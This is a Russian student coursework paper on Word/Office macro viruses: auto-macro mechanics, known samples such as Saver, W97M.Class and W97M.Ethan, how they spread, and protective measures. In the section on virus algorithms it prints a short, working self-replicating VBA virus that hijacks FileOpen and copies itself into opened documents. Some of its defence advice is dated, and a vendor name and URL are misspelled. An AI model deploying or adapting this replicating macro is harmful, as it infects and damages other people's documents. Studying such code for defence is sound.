Вирусы в макросах документов: способы внедрения, распространения и защиты

Процедуры-программы  могут исполняться непосредственно или же активироваться по запросу из других макросов. Их синтаксис следующий: 

 
Sub <Имя_Макроса> 
-> код макроса <- 
' Комментарий начинается с апострофа 
End Sub 
В качестве примера можно привести следующий макрос: 
' Данный макрос открывает окно диалога и выводит в нем сообщение 
Sub Stupid_Greeting 
MsgBox "ХЭЛЛОУ ВОРЛД" 
End Sub

1.2 Макровирусы принципы работы

 

При работе с документом MS Word версий 6 и 7 выполняет различные действия: открывает документ, сохраняет, печатает, закрывает и т. д. При этом Word ищет и выполняет соответствующие встроенные макросы: при сохранении файла по команде File/Save вызывается макрос FileSave, при сохранении по команде File/SaveAs — FileSaveAs, при печати документов — FilePrint и т. д., если, конечно, таковые макросы определены.

Существуют также несколько  «автомакросов», автоматически вызываемых при различных условиях. Например, при открытии документа Word проверяет его на наличие макроса AutoOpen. Если такой макрос присутствует, то Word выполняет его. При закрытии документа Word выполняет макрос AutoClose, при запуске Word вызывается макрос AutoExec, при завершении работы — AutoExit, при создании нового документа — AutoNew. Похожие механизмы, но с другими именами макросов и функций, используются и в Excel/Office 97.

Макровирусы, поражающие файлы Word, Excel или Office 97, как правило пользуются одним из трех вышеперечисленных приемов:

1. в вирусе присутствует автомакрос (автофункция);
2. в вирусе переопределен один из стандартных системных макросов (ассоциированный с каким-либо пунктом меню);
3. макрос вируса автоматически вызывается при нажатии на какую-либо клавишу или комбинацию клавиш.

Бывают также полувирусы, которые не используют перечисленные приемы и размножаются, только если пользователь самостоятельно запускает их на выполнение.

Большинство макровирусов содержат все  свои функции в виде стандартных  макросов MS Word/Excel/Office 97. Существуют, однако, вирусы, использующие приемы скрытия своего кода и хранящие свой код в виде не-макросов. Известны три подобных приема. Все они используют возможность макросов создавать, редактировать и исполнять другие макросы. Как правило, подобные вирусы имеют небольшой (иногда полиморфный) макрос-загрузчик, который вызывает встроенный редактор макросов, создает новый макрос, заполняет его основным кодом вируса, выполняет и затем, как правило, уничтожает, чтобы скрыть следы присутствия вируса.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

2. Постановка задачи

 

Основными задачами данного курсового проекта являются:

1. обзор наиболее известных вирусов в макросах документов;
2. распространение вирусов в макросах документов;
3. способы защиты от вирусов в макросах документов ;
4. Создание вирусов в макросах и их внедрение;

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

3. Обзор наиболее известных вирусов в макросах документов

 

Saver (в переводе с англ. - "Сохранитель") представляет собой макро-вирус, функционирующий на машинах с установленным ПО MS Office, в состав компонентов которого входит Word 97 (версия 8.0) или Word 2003 (версия 11.0 - компания-разработчик Microsoft реализовала ее версию совместимой со всеми предшествующими ей версиями Word, что и послужило причиной работоспособности под ней вируса). Свое название вирус получил за текстовую строку-"копирайт", содержащуюся в его коде: 
SaverVirus, а также за способность создавать на диске копии зараженных им документов. Написан 2 февраля 2000 года в Конотопе, о чем свидетельствует др. текстовая строка-"копирайт" в его теле: 
Макрос записан 02.02.00 КОНОТОП

 
        Saver заражает документы, сохраняемые в формате "DOC", а также файлы с настройками MS Office (DOT-файлы). Документы, записанные в формате "RTF", вирус не может заразить, т.к. в структуре последних отсутствуют макро-секции или "макросы" (секции с настройками, связанными с оформлением текущего документа - размера и типа шрифтов, величины полей, расположения объектов и т.д.), что исключает возможность их заражения. Вирус может быть занесен в машину только через зараженные документы или файлы настроек с вышеуказанными расширениями, если таковые будут открыты пользователем с последующим игнорированием предупреждения встроенной в Word макро-защиты: 
 

                    

Рис1 Предупреждение о запуске макроса

 
Заражение произойдет в том случае, если будет выбрана опция "Не отключать макросы", что почему-то и делает большинство пользователей при появлении данного запроса. После этого Saver отключает встроенную в Word 97 защиту от вирусов в макросах - VirusProtection (под Word 2003 вирус не может этого сделать, т.к. принцип данной защиты там немного др.) и заражает файл шаблона настроек данного редактора: 
 
приWord97: 
C:\ProgramFiles\MicrosoftOffice\Шаблоны\Normal.dot 
 
приWord2003: 
C:\Documents and Settings\%имя текущего пользователя%\Application Data\Microsoft\Шаблоны\Normal.dot 
Изменяя его номинальный размер с 26624 байта на 39424 байта или 27136 байт на 39936 байт(пояснение: Normal.dot может иметь один из двух указанных номинальных размеров, что зависит от некоторых системных условий) для Word 97 (для Word 2003 значение зараженного файла-шаблона может быть различным, поскольку оригинальный размер данного объекта может существенно варьироваться в зависимости от ряда настроек, установленных в Word'е). Затем вирус омертвляет файл Normal.dot, превращая его в дроппер своей программы ("dropper" - пускатель, активатор): изменяет его содержимое таким образом, что управление передается на вирусный код. Этот код вирус сохраняет в создаваемый им файл saver.dll: 
 
приWord97: 
C:\ProgramFiles\MicrosoftOffice\Office\saver.dll 
 
приWord2003: 
C:\ProgramFiles\MicrosoftOffice\OFFICE11\saver.dll 
 
Данный файл имеет размер 29696 байт и представляет собой модифицированный вирусом файл-шаблон Normal.dot. 

 

 
                                                 W97M.Class

 
         Class.sys - вспомогательный файл к вирусу W97M.Class, "ложится" в корневой каталог C:\ . Текст программы-вируса в конце документа (часть программы пишется еще вNormal.dot, т.к. в теле программы есть проверка на количество строк в этом шаблоне). Вирус поражает файл Normal.dot (это шаблон Word97 , вирус делает его больше 50 кБ), а также поражает все открываемые документы Word, т.е. файлы с расширением *.doc, причем делает их примерно в 2 раза больше по размеру. 
Вирус активизируется после 14 мая и будет Вас "приветствовать" и дальше, 14 числа каждого последующего месяца. Перемешивает строки в документах, выдает сообщение:  «Я думаю, что' ИМЯ_ПОЛЬЗОВАТЕЛЯ' большой толстый сопляк!»

после этого заменяет строки, сохраняет  документ и закрывает его.

 

 

 

 

 

W97M.Ethan

 

W97M.Ethan - макрокомандный вирус, состоящий всего из одной макрокоманды. Заражает документы приложения Word97 при их закрытии и глобальный шаблон NORMAL.DOT.

Благоприятным фактором распространения вируса W97M.Ethan служит то, что в Microsoft Word макросы автоматически запускаются при открытии любого документа, его закрытии, сохранении и т.д.

Кроме того, имеется так называемый общий  шаблон NORMAL.DOT и макросы, помещенные в общий шаблон, автоматически  запускаются при открытии любого документа. Если учесть, что копирование  макросов из документа в документ (в частности, в общий шаблон) выполняется  всего одной командой, то среда  Microsoft Word представляется идеальной для существования макрокомандных вирусов подобныхW97M.Ethan

     Инфицирование системы:

После попадания  в систему вирус помещает свою единственную макрокоманду в начало модуля, написанного на языке VBA (Visual Basic for Applications - язык Visual Basic для приложений ) - "ThisDocument". "ThisDocument" является модулем в шаблоне MS Word 97.

При заражении  документа или общего шаблона  вирус использует временный текстовый  файл "C:\Ethan.___" который является источником его вирусного кода. Данному  файлу вирус присваивает атрибуты системный и скрытый.

 

4. Распространение макровирусов

 
       При запуске Word'а Normal.dot передает управление вирусному "файлу-шаблону" saver.dll. Опыты, проведенные с вирусом на тест-машине, дали следующие результаты:

 
1. Вирус заражает документы при их закрытии: записывает в их макросекцию свой код, используя собственный макрос AutoSave ("Автосохранение"). При этом вирус блокирует стандартный запрос о подтверждении сохранения документа с внесенными в него изменениями, в результате чего все произведенные в документе изменения как вирусом, так и пользователем, автоматически сохраняются без ведома последнего. 
 
2. В том случае, если документ был просто открыт пользователем или редактировался и запоминался через опцию "Сохранить", вирус заражает этот документ; если же последний перезапоминался пользователем через опцию "Сохранить как...", то вирус заражает только пересохраненный документ, а исходный оставляет без изменения. При этом и в том, и в др. случаях увеличение размера файлов после заражения зависит от ряда условий и не имеет точного значения. 
 
3. Учитывая тот факт, что вирус заражает документы повторно даже просто при их просмотре без внесения пользователем каких-либо изменений, размер файлов постоянно увеличивается, в связи с чем на старых машинах с жесткими дисками небольшого объема свободное место очень быстро уменьшается. Также может наблюдаться сильное торможение машины при работе с Word'ом, что связано с дополнительными затратами ресурсов оперативной памяти на обработку "раздутых" вирусом макросекций зараженных документов и в конечном итоге может стать реальной причиной зависания последних при их открытии. 
 
4. После заражения первого документа на чистой машине вирус создает свой подкаталог: 
 
приWord97: 
C:\ProgramFiles\MicrosoftOffice\Office\Doc_Copy\ 
 
приWord2003: 
C:\ProgramFiles\MicrosoftOffice\OFFICE11\Doc_Copy\ 
 
в который копирует каждый из вновь зараженных документов. Впоследствии, если имя текущего открытого документа, заражаемого вирусом (повторно или первый раз - не имеет значения) совпадает с именем копии документа, уже находящейся в каталоге "Doc_Copy", то вирус, в зависимости от своих внутренних счетчиков, может перезаписать оригинальное содержимое текущего документа содержимым из файла-копии, что влечет безвозвратную потерю содержимого текущего документа. 
Также существует вероятность утечки конфиденциальных данных в том случае, если за машиной работает несколько пользователей: например, один из них работает с дискеты с документом, содержащим секретную финансовую или какую-либо др. информацию, которую не должны знать остальные пользователи. Однако после того, как вирус создаст копию данного файла в папке "Doc_Copy", содержимое документа может быть доступно для просмотра др. пользователям данного компьютера. 
 
5. После закрытия Word'а программа вируса автоматически отключается - срабатывает вирусный макрос AutoClose ("Автоматическое закрытие"). 

4.1 Алгоритм работы макровирусов для Microsoft Office

 

Большинство известных Word-вирусов (версий 6, 7 и Word 97) при запуске переносят собственный код в область глобальных макросов документа («общие» макросы).

При выходе из Word глобальные макросы (включая макросы вируса) автоматически записываются в DOT-файл глобальных макросов (обычно таким файлом является NORMAL.DOT). Таким образом, вирус активизируется в тот момент, когда Word грузит глобальные макросы.

Затем вирус переопределяет (или  уже содержит в себе) один или  несколько стандартных макросов (например, FileOpen, FileSave, FileSaveAs, FilePrint) и перехватывает таким образом команды работы с файлами. При вызове этих команд заражается файл, к которому идет обращение. Для этого вирус конвертирует файл в формат Template (что делает невозможными дальнейшие изменения формата файла, т. е. конвертирование в какой-либо не-Template формат) и записывает в файл свои макросы, включая Auto-макрос.

Другой способ внедрения вируса в систему базируется на так называемых «Add-in» файлах, т. е. файлах, являющихся служебными дополнениями к Word. В этом случае NORMAL.DOT не изменяется, а Word при запуске загружает макросы вируса из файла (или файлов), определенного как «Add-in». Этот способ практически полностью повторяет заражение глобальных макросов за тем лишь исключением, что макросы вируса хранятся не в NORMAL.DOT, а в каком-либо другом файле.

Возможно также внедрение вируса в файлы, расположенные в каталоге STARTUP. В этом случае Word автоматически подгружает файлы-шаблоны из этого каталога, но такие вирусы пока не встречались. 
         Рассмотрим вирус, предназначенный для заражения Word-документов. Этот вирус использует служебное имя FileOpen. Процедура FileOpen() выполняется всякий раз, когда пользователь открывает файл и маскируется под обычный диалог Файл->Открыть файл.

Sub FileOpen()

 InfectorPath = MacroContainer.Path + "\" + MacroContainer.Name

Rem Переменная InfectorPath определяет путь к документу, содержащему вирус.

  Dialogs(wdDialogFileOpen).Show

Rem Имитируется диалог Файл->Открыть файл

  Infected = False

  For Each VbComponent In ActiveDocument.VBProject.VBComponents

      If VbComponent.Name = "Virus" Then Infected = True

Rem Здесь открытый пользователем файл проверяется на наличие вируса

  Next

  If Not Infected Then

Rem Если файл не заражен, вирус дописывается в файл

    CopyMacro ActiveDocument.Path + "\" + ActiveDocument.Name, InfectorPath

  End If

End Sub

Public Sub CopyMacro(NewDestination, NewSource)

  On Error GoTo nextline

    Application.OrganizerCopy Source:= _

        NewSource, Destination:=NewDestination, Name:="Virus", Object:= _

        WdOrganizerObjectProjectItems

Rem копируем модуль с вирусом 

     ActiveDocument.Save

Rem сохраняем документ

nextline:

End Sub

 

 

 

 

 

 5.  Способы защиты от вирусов в макросах документов

 

Макровирусы обычно пишут школьники  в целях самоутверждения. Такие  вирусы не делают ничего плохого - они  только размножаются на Вашем компьютере. Однако не следует пренебрегать средствами зашиты от макровирусов, так как с помощью WordBasic можно написать вирус, портящий документы Word, или даже форматирующий жесткий диск. Особенность макровирусов состоит в том, что обычные антивирусы их не распознают. Для защиты от макровирусов можно порекомендовать ViruScan фирмы MacCafee. (http://www.macafee.com). Кроме того существует несколько простых способов предотвратить заражение. В Word 6.0 все макросы хранятся в файлах шаблонов (*.dot) и доступны только при открытом шаблоне. Поскольку при открытии Word автоматически загружает глобальный шаблон Normal.dot, все вирусы стремятся записать себя туда. Поэтому, если Вы работаете в Word 6.0, укажите для файла Normal.dot атрибут "только чтение". Еще один вариант - при открытии подозрительных документов держать нажатой клавишу shift, чтобы не допустить выполнение автомакросов. Ну и разумеется, если Вы обнаружите в списке макросов имена, начинающиеся на auto - сотрите их немедленно.В Word97 макросы могут содержаться не только в шаблонах, но и в обычных документах. Как уже упоминалось, для автоматического запуска макроса при том или ином событии макрос должен иметь одно из следующих имен:

• AutoExec - Запускается при старте Word или загрузке глобального шаблона
• AutoNew - Запускается при создании нового документа
• AutoOpen - Запускается при открытии документа
• AutoClose - Запускается при закрытии документа
• AutoExit - Запускается при выходе из Word или при закрытии глобального шаблона.

Конечно можно отменить выполнение таких макросов, нажав клавишу Shift при загрузке Word, а также при открытии, создании и закрытии документов, однако такой способ представляется утомительным. Напишем макрос, препятствующий выполнению автомакросов:

 

Sub Autoexec()

 

  MsgBox "Не допустим размножения вирусов!"

 

  WordBasic.DisableAutoMacros

 

End Sub

 

Для предотвращения заражения документов макровирусами необходимо хорошо предсталять себе их принцип работы. Создатели Microsoft Office облегчили задачу злоумышленников тем, что ввели возможность подменять команды Word макрокомандами пользователя. Это значит, что если в Вашем документе есть макрос с именем, скажем, FileOpen, он будет исполняться всякий раз при открытии другого документа.

Особенно уязвимы пользователи Word 97. В старых добрых версиях Word макросы могли храниться только в шаблонах (файлах *.dot). Office'97 позволяет хранить макросы непосредственно в документе - следовательно, возможностей распространения вирусов становится больше.